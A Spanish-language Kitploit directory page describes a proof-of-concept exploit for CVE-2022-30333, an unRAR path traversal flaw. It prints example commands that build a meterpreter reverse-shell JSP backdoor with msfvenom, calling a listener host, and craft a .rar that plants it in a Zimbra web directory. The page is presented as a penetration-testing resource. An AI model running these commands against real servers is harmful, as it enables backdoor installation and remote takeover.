Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
unrar-cve-2022-30333-poc — Prueba de concepto del exploit para CVE-2022-30333, una vulnerabilidad de path traversal en unRAR, que genera archivos .rar maliciosos para colocar payloads en ubicaciones arbitrarias. Se integra con Metasploit y msfvenom para pruebas de penetración. | Kitploit
Herramientas/GitHubGitHub/rbowes-r7/unrar-cve-2022-30333-poc
Frameworks de ExploitsGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubrbowes-r7/unrar-cve-2022-30333-poc

unrar-cve-2022-30333-poc

Prueba de concepto del exploit para CVE-2022-30333, una vulnerabilidad de path traversal en unRAR, que genera archivos .rar maliciosos para colocar payloads en ubicaciones arbitrarias. Se integra con Metasploit y msfvenom para pruebas de penetración.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
145hace 4 añosAún no revisado

Una prueba de concepto para CVE-2022-30333 - una vulnerabilidad de path traversal en unRAR versiones anteriores a la 6.11. Creé esto como una demostración del exploit para un artículo en AttackerKB, y espero incorporarlo en un Módulo de Metasploit pronto!

Básicamente, proporcionas un destino (incluyendo path traversal) y algunos datos de archivo, y esta herramienta generará un .rar que extraerá ese archivo en esa ubicación. La longitud máxima del archivo es de 104 bytes, y la longitud máxima del archivo es de 4096 bytes. (Eso no es intrínseco a la vulnerabilidad, es solo lo que elegí cuando generé el archivo).

Por ejemplo, genera una puerta trasera con msfvenom:

root@kitploit:~
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp

Luego crea un archivo .rar, plantando el .jsp en algún lugar divertido:

root@kitploit:~
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar
Descargar herramienta